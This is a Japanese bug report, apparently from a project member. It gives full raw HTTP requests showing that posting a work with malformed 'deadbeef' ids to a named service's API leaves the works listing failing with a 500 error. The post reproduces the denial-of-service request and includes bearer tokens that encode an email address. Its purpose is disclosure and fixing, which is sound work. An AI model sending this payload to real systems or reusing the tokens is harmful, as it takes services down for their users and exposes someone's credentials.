不正なidのPOSTによるサービスダウン

[t3mp-0xCC]

投稿時に以下のような不正なidを含んだリクエストを送信するとworksの表示でInternal Server Errorにより500がレスポンスされ、閲覧が不可能になる。

POST /api/v1/works?post_discord=true HTTP/2
Host: kodomobeya.compositecomputer.club
Content-Length: 269
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Accept: application/json, text/plain, */*
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJoYXlhYnVzYS5rYWl5b3VAZ21haWwuY29tIiwidG9rZW5fdHlwZSI6ImJlYXJlciIsImV4cCI6MTY2ODM1Mzg2MH0.42C18yeGywc0J4tvMArcCNcbdTIdtGrufztMkQr32dE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://toybox.compositecomputer.club
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://toybox.compositecomputer.club/
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8

{
    "title":"Dangerous Toy",
    "description":"I ganna down the toybox server",
    "visibility":"private",
    "thumbnail_asset_id":"deadbeef",
    "assets_id":["deadbeef"],
    "urls":[],
    "tags_id":["deadbeef"]
}

正常なリクエストはこんな感じ

POST /api/v1/works?post_discord=true HTTP/2
Host: kodomobeya.compositecomputer.club
Content-Length: 269
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Accept: application/json, text/plain, */*
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJoYXlhYnVzYS5rYWl5b3VAZ21haWwuY29tIiwidG9rZW5fdHlwZSI6ImJlYXJlciIsImV4cCI6MTY2ODM1Mzg2MH0.42C18yeGywc0J4tvMArcCNcbdTIdtGrufztMkQr32dE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://toybox.compositecomputer.club
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://toybox.compositecomputer.club/
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8

{
    "title":"Dangerous Toy",
    "description":"I ganna down the toybox server",
    "visibility":"private",
    "thumbnail_asset_id":"d3e8606e-f5a4-4a89-a4d4-64f5a043c63f",
    "assets_id":["f77c3ad2-0166-4e3b-bf23-26fdcd206222"],
    "urls":[],
    "tags_id":["e5b3e6b2-7c26-42a4-a163-c3803519e2e2"]
}

500が返ってくるリクエストとレスポンスは以下

GET /api/v1/works HTTP/2
Host: kodomobeya.compositecomputer.club
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json, text/plain, */*
Accept-Language: ja,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJoYXlhYnVzYS5rYWl5b3VAZ21haWwuY29tIiwidG9rZW5fdHlwZSI6ImJlYXJlciIsImV4cCI6MTY2ODM1NDE5NX0.nrPTmIjsVC0R-7QZ_jTToZOg_IqE3oWuMtuHI93ZdKU
Origin: https://toybox.compositecomputer.club
DNT: 1
Connection: keep-alive
Referer: https://toybox.compositecomputer.club/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Sec-GPC: 1
Pragma: no-cache
Cache-Control: no-cache
TE: trailers

HTTP/2 500 Internal Server Error
date: Sun, 13 Nov 2022 15:28:27 GMT
content-type: text/plain; charset=utf-8
content-length: 21
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yx9lvE4ql27OUwn9%2FEHQbAPbLNc%2FJ77dRYLKkUuFZf7A2VQZj0A7SaXXD4zJ8mIb4QSCyKFIzPKbYjGRaXI7bcvc%2FvpUvqnMFiYrzQHMtIg3xWuP9lrMJrRvcB0sGZROvWLM5zStYh4WROwIvyqChYGcUhI%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 7698898afb9580fc-NRT
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2

[t3mp-0xCC]

修正も自分でやります。